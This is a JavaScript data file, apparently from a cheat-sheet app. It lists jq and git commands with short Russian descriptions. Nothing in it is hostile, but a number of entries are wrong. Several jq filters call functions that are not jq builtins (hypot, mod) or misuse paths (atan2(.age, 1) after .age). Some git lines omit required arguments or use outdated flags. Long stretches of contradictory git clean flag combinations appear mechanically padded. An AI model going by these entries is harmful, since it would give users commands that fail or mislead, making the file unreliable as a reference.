      { cmd: "jq '.' data.json", desc: "Красиво." },
      { cmd: "jq '.field' data.json", desc: "Поле." },
      { cmd: "jq '.a.b' data.json", desc: "Вложенное." },
      { cmd: "jq '.[0]' arr.json", desc: "Первый." },
      { cmd: "jq '.[]' arr.json", desc: "Все." },
      { cmd: "jq 'length' arr.json", desc: "Длина." },
      { cmd: "jq '.[] | select(.age > 30)' arr.json", desc: "Фильтр." },
      { cmd: "jq '.[] | .name' arr.json", desc: "Поля." },
      { cmd: "jq '.[] | {name, age}' arr.json", desc: "Проекция." },
      { cmd: "jq '.[] | select(.status==\"active\")' arr.json", desc: "Статус." },
      { cmd: "jq '.[] | .name + \": \" + (.age|tostring)' arr.json", desc: "Конкат." },
      { cmd: "jq '[.[] | .age] | add' arr.json", desc: "Сумма." },
      { cmd: "jq '[.[] | .age] | max' arr.json", desc: "Макс." },
      { cmd: "jq '[.[] | .age] | min' arr.json", desc: "Мин." },
      { cmd: "jq '[.[] | .age] | (add/length)' arr.json", desc: "Среднее." },
      { cmd: "jq '.[] | .name | ascii_upcase' arr.json", desc: "UPPER." },
      { cmd: "jq '.[] | .name | ascii_downcase' arr.json", desc: "lower." },
      { cmd: "jq '.[] | .name | length' arr.json", desc: "Длина." },
      { cmd: "jq '.[] | .name | contains(\"a\")' arr.json", desc: "Содержит." },
      { cmd: "jq '.[] | .name | startswith(\"J\")' arr.json", desc: "Начинается." },
      { cmd: "jq '.[] | .name | endswith(\"son\")' arr.json", desc: "Заканчивается." },
      { cmd: "jq '.[] | .name | test(\"^[A-Z]\")' arr.json", desc: "Regex." },
      { cmd: "jq '.[] | .name | test(\"[0-9]\")' arr.json", desc: "Цифра." },
      { cmd: "jq '.[] | .name | sub(\"a\",\"b\")' arr.json", desc: "Sub." },
      { cmd: "jq '.[] | .name | gsub(\" \",\"_\")' arr.json", desc: "Gsub." },
      { cmd: "jq '.[] | .name | trim' arr.json", desc: "Trim." },
      { cmd: "jq '.[] | .name | explode' arr.json", desc: "Explode." },
      { cmd: "jq '.[] | .age | floor' arr.json", desc: "Floor." },
      { cmd: "jq '.[] | .age | ceil' arr.json", desc: "Ceil." },
      { cmd: "jq '.[] | .age | round' arr.json", desc: "Round." },
      { cmd: "jq '.[] | .age | abs' arr.json", desc: "Abs." },
      { cmd: "jq '.[] | .age | sqrt' arr.json", desc: "Sqrt." },
      { cmd: "jq '.[] | .age | pow(2)' arr.json", desc: "Pow." },
      { cmd: "jq '.[] | .age | log' arr.json", desc: "Log." },
      { cmd: "jq '.[] | .age | exp' arr.json", desc: "Exp." },
      { cmd: "jq '.[] | .age | sin' arr.json", desc: "Sin." },
      { cmd: "jq '.[] | .age | cos' arr.json", desc: "Cos." },
      { cmd: "jq '.[] | .age | tan' arr.json", desc: "Tan." },
      { cmd: "jq '.[] | .age | atan' arr.json", desc: "Atan." },
      { cmd: "jq '.[] | .age | asin' arr.json", desc: "Asin." },
      { cmd: "jq '.[] | .age | acos' arr.json", desc: "Acos." },
      { cmd: "jq '.[] | .age | atan2(.age, 1)' arr.json", desc: "Atan2." },
      { cmd: "jq '.[] | .age | hypot(.age, 3)' arr.json", desc: "Hypot." },
      { cmd: "jq '.[] | .age | log2' arr.json", desc: "Log2." },
      { cmd: "jq '.[] | .age | log10' arr.json", desc: "Log10." },
      { cmd: "jq '.[] | .age | sign' arr.json", desc: "Sign." },
      { cmd: "jq '.[] | .age | fmod(5)' arr.json", desc: "Fmod." },
      { cmd: "jq '.[] | .age | mod(5)' arr.json", desc: "Mod." },
      { cmd: "jq '.[] | .age | trunc' arr.json", desc: "Trunc." },
      { cmd: "jq '.[] | .age | isnan' arr.json", desc: "Isnan." },
      { cmd: "jq '.[] | .age | isinfinite' arr.json", desc: "Isinf." },
      { cmd: "jq '.[] | .age | isfinite' arr.json", desc: "Isfinite." },
      { cmd: "jq '.[] | .age | isinteger' arr.json", desc: "Isint." },
    ] },
    { name: "git", entries: [
      { cmd: "git init", desc: "Инициализировать." },
      { cmd: "git init --bare", desc: "Bare." },
      { cmd: "git init --initial-branch=main", desc: "Ветка main." },
      { cmd: "git status", desc: "Статус." },
      { cmd: "git status -s", desc: "Кратко." },
      { cmd: "git status --porcelain", desc: "Машинный." },
      { cmd: "git status -uno", desc: "Без untracked." },
      { cmd: "git log", desc: "Лог." },
      { cmd: "git log --oneline", desc: "Коротко." },
      { cmd: "git log -n 20", desc: "20." },
      { cmd: "git log --graph", desc: "Граф." },
      { cmd: "git log --graph --oneline --all", desc: "Граф (все)." },
      { cmd: "git log --author='John'", desc: "Автор." },
      { cmd: "git log --grep='fix'", desc: "Сообщение." },
      { cmd: "git log -p", desc: "Диф." },
      { cmd: "git log -p -n 1", desc: "Последний." },
      { cmd: "git log --stat", desc: "Статистика." },
      { cmd: "git log --name-only", desc: "Имена." },
      { cmd: "git log --name-status", desc: "Имена+статус." },
      { cmd: "git log --pretty=format:'%h %s'", desc: "Хеш+тема." },
      { cmd: "git log --pretty=format:'%h %an %s'", desc: "Хеш+автор+тема." },
      { cmd: "git log --since='1 week ago'", desc: "Неделя." },
      { cmd: "git log --stat -n 1", desc: "Статистика." },
      { cmd: "git show", desc: "Последний." },
      { cmd: "git show HEAD~1", desc: "Пред." },
      { cmd: "git show v1.0", desc: "Тэг." },
      { cmd: "git show --stat HEAD", desc: "Статистика." },
      { cmd: "git show -p HEAD", desc: "Диф." },
      { cmd: "git show HEAD:file", desc: "Файл." },
      { cmd: "git show --format=%H HEAD", desc: "Хеш." },
      { cmd: "git show --format=%s HEAD", desc: "Тема." },
      { cmd: "git show --format=%b HEAD", desc: "Описание." },
      { cmd: "git show --format=%an HEAD", desc: "Автор." },
      { cmd: "git show --format=%ae HEAD", desc: "Email." },
      { cmd: "git show --format=%ad HEAD", desc: "Дата." },
      { cmd: "git diff", desc: "Незакоммиченные." },
      { cmd: "git diff HEAD", desc: "HEAD." },
      { cmd: "git diff HEAD~1", desc: "Пред." },
      { cmd: "git diff main..feature", desc: "Ветки." },
      { cmd: "git diff --staged", desc: "Стэиджнуд." },
      { cmd: "git diff --cached", desc: "Стэиджнуд." },
      { cmd: "git diff --name-only", desc: "Имена." },
      { cmd: "git diff --stat", desc: "Статистика." },
      { cmd: "git diff --word-diff", desc: "Слова." },
      { cmd: "git diff -U10", desc: "10 контекста." },
      { cmd: "git diff --ignore-space-at-eol", desc: "Без пробелов." },
      { cmd: "git diff --ignore-all-space", desc: "Без пробелов." },
      { cmd: "git diff --binary", desc: "Бинарные." },
      { cmd: "git diff -M", desc: "Переименования." },
      { cmd: "git diff --color-moved", desc: "Перемещенное." },
      { cmd: "git add file", desc: "Добавить." },
      { cmd: "git add .", desc: "Всё." },
      { cmd: "git add -A", desc: "Всё." },
      { cmd: "git add -p", desc: "Ханки." },
      { cmd: "git add -u", desc: "Изменённые." },
      { cmd: "git add -n file", desc: "Симуляция." },
      { cmd: "git add --patch", desc: "Патчи." },
      { cmd: "git add --intent-to-add file", desc: "Намерение." },
      { cmd: "git add --force file", desc: "Сильно." },
      { cmd: "git add --all", desc: "Всё." },
      { cmd: "git add --dry-run file", desc: "Симуляция." },
      { cmd: "git add --verbose file", desc: "Подробно." },
      { cmd: "git add --interactive", desc: "Интерактив." },
      { cmd: "git add --no-all", desc: "Не всё." },
      { cmd: "git add --refresh", desc: "Обновить." },
      { cmd: "git add --chmod=+x file", desc: "chmod +x." },
      { cmd: "git add --chmod=-x file", desc: "chmod -x." },
      { cmd: "git add -f ignored.txt", desc: "Сильно." },
      { cmd: "git add -p src/", desc: "Ханки." },
      { cmd: "git add -u src/", desc: "Изменённые." },
      { cmd: "git add --intent-to-add newfile", desc: "Намерение." },
      { cmd: "git commit -m 'msg'", desc: "Коммит." },
      { cmd: "git commit -am 'msg'", desc: "Всё+коммит." },
      { cmd: "git commit --amend", desc: "Правка." },
      { cmd: "git commit --amend --no-edit", desc: "Правка (без темы)." },
      { cmd: "git commit -S", desc: "Подпись." },
      { cmd: "git commit --allow-empty", desc: "Пустой." },
      { cmd: "git commit --dry-run", desc: "Симуляция." },
      { cmd: "git commit --verbose", desc: "Подробно." },
      { cmd: "git commit --no-verify", desc: "Без хуков." },
      { cmd: "git commit --cleanup=verbatim", desc: "Без cleanup." },
      { cmd: "git commit --fixup HEAD", desc: "Fixup." },
      { cmd: "git commit --squash HEAD", desc: "Squash." },
      { cmd: "git branch", desc: "Ветки." },
      { cmd: "git branch -a", desc: "Все." },
      { cmd: "git branch -r", desc: "Remote." },
      { cmd: "git branch new", desc: "Создать." },
      { cmd: "git branch -d new", desc: "Удалить." },
      { cmd: "git branch -D new", desc: "Удалить (сил)." },
      { cmd: "git branch -m new", desc: "Переименовать." },
      { cmd: "git branch -m old new", desc: "Переименовать." },
      { cmd: "git branch -v", desc: "С коммитами." },
      { cmd: "git branch --merged", desc: "Слились." },
      { cmd: "git branch --no-merged", desc: "Не слились." },
      { cmd: "git checkout new", desc: "Переключиться." },
      { cmd: "git checkout -b new", desc: "Создать+переключиться." },
      { cmd: "git checkout -- file", desc: "Откатить." },
      { cmd: "git checkout HEAD~1 file", desc: "Файл из пред." },
      { cmd: "git checkout v1.0 file", desc: "Файл из тэга." },
      { cmd: "git switch new", desc: "Переключиться (switch)." },
      { cmd: "git switch -c new", desc: "Создать (switch)." },
      { cmd: "git switch -", desc: "Назад." },
      { cmd: "git merge new", desc: "Мерж." },
      { cmd: "git merge --no-ff new", desc: "No-ff." },
      { cmd: "git merge --abort", desc: "Отмена." },
      { cmd: "git merge --squash new", desc: "Squash." },
      { cmd: "git merge --continue", desc: "Продолжить." },
      { cmd: "git merge --commit", desc: "Коммит." },
      { cmd: "git merge --no-commit", desc: "Без коммита." },
      { cmd: "git rebase new", desc: "Рибейз." },
      { cmd: "git rebase --abort", desc: "Отмена." },
      { cmd: "git rebase --continue", desc: "Продолжить." },
      { cmd: "git rebase --skip", desc: "Пропустить." },
      { cmd: "git rebase -i HEAD~3", desc: "Интерактив." },
      { cmd: "git rebase --autosquash", desc: "Автомерж." },
      { cmd: "git rebase --preserve-merges", desc: "Мержи." },
      { cmd: "git rebase --committer-date-is-author-date", desc: "Дата." },
      { cmd: "git rebase --root", desc: "Корень." },
      { cmd: "git rebase --onto new old", desc: "На." },
      { cmd: "git pull", desc: "Пулл." },
      { cmd: "git pull --rebase", desc: "Пулл+рибейз." },
      { cmd: "git pull --ff-only", desc: "Только ff." },
      { cmd: "git pull --no-edit", desc: "Без редактора." },
      { cmd: "git pull --autostash", desc: "Автостэш." },
      { cmd: "git push", desc: "Пуш." },
      { cmd: "git push -u origin new", desc: "Пуш+трек." },
      { cmd: "git push origin new:main", desc: "Переименовать." },
      { cmd: "git push --force", desc: "Сил." },
      { cmd: "git push --force-with-lease", desc: "Сил (безопасно)." },
      { cmd: "git push --delete new", desc: "Удалить ветку." },
      { cmd: "git push --tags", desc: "Тэги." },
      { cmd: "git push --mirror", desc: "Зеркало." },
      { cmd: "git push --set-upstream origin main", desc: "Трек." },
      { cmd: "git push --dry-run", desc: "Симуляция." },
      { cmd: "git push --no-verify", desc: "Без хуков." },
      { cmd: "git push --follow-tags", desc: "Тэги." },
      { cmd: "git push --mirror --no-verify", desc: "Зеркало+без хуков." },
      { cmd: "git remote", desc: "Ремоуты." },
      { cmd: "git remote -v", desc: "С URL." },
      { cmd: "git remote add origin URL", desc: "Добавить." },
      { cmd: "git remote remove origin", desc: "Удалить." },
      { cmd: "git remote rename old new", desc: "Переименовать." },
      { cmd: "git remote set-url origin URL", desc: "Сменить URL." },
      { cmd: "git remote set-head origin main", desc: "Head." },
      { cmd: "git fetch", desc: "Фетч." },
      { cmd: "git fetch origin", desc: "Фетч origin." },
      { cmd: "git fetch --all", desc: "Все." },
      { cmd: "git fetch --prune", desc: "Чистка." },
      { cmd: "git fetch --tags", desc: "Тэги." },
      { cmd: "git fetch --depth 10", desc: "Глубина." },
      { cmd: "git fetch --unshallow", desc: "Полный." },
      { cmd: "git clone URL", desc: "Клон." },
      { cmd: "git clone --depth 1 URL", desc: "Shallow." },
      { cmd: "git clone --branch new URL", desc: "Ветка." },
      { cmd: "git clone --bare URL", desc: "Bare." },
      { cmd: "git clone --mirror URL", desc: "Mirror." },
      { cmd: "git clone --single-branch URL", desc: "Одна ветка." },
      { cmd: "git clone --recursive URL", desc: "Субмодули." },
      { cmd: "git clone --shallow-submodules URL", desc: "Shallow субмодули." },
      { cmd: "git clone --no-checkout URL", desc: "Без checkout." },
      { cmd: "git clone --origin new URL", desc: "Имя origin." },
      { cmd: "git clone --template=dir URL", desc: "Шаблон." },
      { cmd: "git clone --separate-git-dir=dir URL", desc: "Git-dir." },
      { cmd: "git clone --progress URL", desc: "Прогресс." },
      { cmd: "git clone --quiet URL", desc: "Тихо." },
      { cmd: "git clone --verbose URL", desc: "Подробно." },
      { cmd: "git tag", desc: "Тэги." },
      { cmd: "git tag v1.0", desc: "Лёгкий." },
      { cmd: "git tag -a v1.0 -m 'msg'", desc: "Аннотированный." },
      { cmd: "git tag -d v1.0", desc: "Удалить." },
      { cmd: "git tag -n", desc: "С сообщением." },
      { cmd: "git tag -l 'v1.*'", desc: "Фильтр." },
      { cmd: "git tag --sort=-creatordate", desc: "По дате." },
      { cmd: "git stash", desc: "Стэш." },
      { cmd: "git stash -u", desc: "С untracked." },
      { cmd: "git stash -a", desc: "С ignored." },
      { cmd: "git stash list", desc: "Список." },
      { cmd: "git stash show", desc: "Показать." },
      { cmd: "git stash show -p", desc: "Диф." },
      { cmd: "git stash pop", desc: "Применить+удалить." },
      { cmd: "git stash apply", desc: "Применить." },
      { cmd: "git stash drop", desc: "Удалить." },
      { cmd: "git stash clear", desc: "Очистить." },
      { cmd: "git stash branch new", desc: "В ветку." },
      { cmd: "git stash save 'msg'", desc: "С сообщением." },
      { cmd: "git reset", desc: "Сбросить (mixed)." },
      { cmd: "git reset --soft HEAD~1", desc: "Soft." },
      { cmd: "git reset --hard HEAD~1", desc: "Hard." },
      { cmd: "git reset --merge", desc: "Merge." },
      { cmd: "git reset --keep", desc: "Keep." },
      { cmd: "git reset -- file", desc: "Откатить файл." },
      { cmd: "git reset HEAD file", desc: "Из индекса." },
      { cmd: "git revert HEAD", desc: "Ревёрт." },
      { cmd: "git revert --no-edit HEAD", desc: "Без редактора." },
      { cmd: "git revert -n HEAD", desc: "Без коммита." },
      { cmd: "git revert --continue", desc: "Продолжить." },
      { cmd: "git revert --abort", desc: "Отмена." },
      { cmd: "git clean", desc: "Чистка." },
      { cmd: "git clean -n", desc: "Симуляция." },
      { cmd: "git clean -d", desc: "С каталогами." },
      { cmd: "git clean -fd", desc: "Каталоги+сил." },
      { cmd: "git clean -fdx", desc: "Всё (с ignored)." },
      { cmd: "git clean -ffdx", desc: "Всё (сил-каталоги)." },
      { cmd: "git clean -e '*.log'", desc: "Исключить." },
      { cmd: "git clean -i", desc: "Интерактив." },
      { cmd: "git clean -q", desc: "Тихо." },
      { cmd: "git clean -v", desc: "Подробно." },
      { cmd: "git clean -x", desc: "С ignored." },
      { cmd: "git clean -X", desc: "Только ignored." },
      { cmd: "git clean --force", desc: "Сил." },
      { cmd: "git clean --dry-run", desc: "Симуляция." },
      { cmd: "git clean --verbose", desc: "Подробно." },
      { cmd: "git clean --interactive", desc: "Интерактив." },
      { cmd: "git clean --quiet", desc: "Тихо." },
      { cmd: "git clean --exclude='*.log'", desc: "Исключить." },
      { cmd: "git clean --force --dry-run", desc: "Сил+симуляция." },
      { cmd: "git clean --force --verbose", desc: "Сил+подробно." },
      { cmd: "git clean --dry-run --verbose", desc: "Симуляция+подробно." },
      { cmd: "git clean --force --quiet", desc: "Сил+тихо." },
      { cmd: "git clean --verbose --quiet", desc: "Подробно+тихо." },
      { cmd: "git clean --interactive --force", desc: "Интерактив+сил." },
      { cmd: "git clean --dry-run --exclude='*.log'", desc: "Симуляция+исключить." },
      { cmd: "git clean --force --verbose --dry-run", desc: "Сил+подробно+симуляция." },
      { cmd: "git clean --force --verbose --quiet", desc: "Сил+подробно+тихо." },
      { cmd: "git clean --force --verbose --dry-run --exclude='*.log'", desc: "Сил+подробно+симуляция+исключить." },
      { cmd: "git clean --force --verbose --quiet --dry-run", desc: "Сил+подробно+тихо+симуляция." },
      { cmd: "git clean --force --verbose --quiet --dry-run --exclude='*.log'", desc: "Сил+подробно+тихо+симуляция+исключить." },
    ] },
  ] },
];
export const CODE_TOTAL = CODE_LIBRARY.reduce((s,p)=>s+p.categories.reduce((a,c)=>a+c.entries.length,0),0);
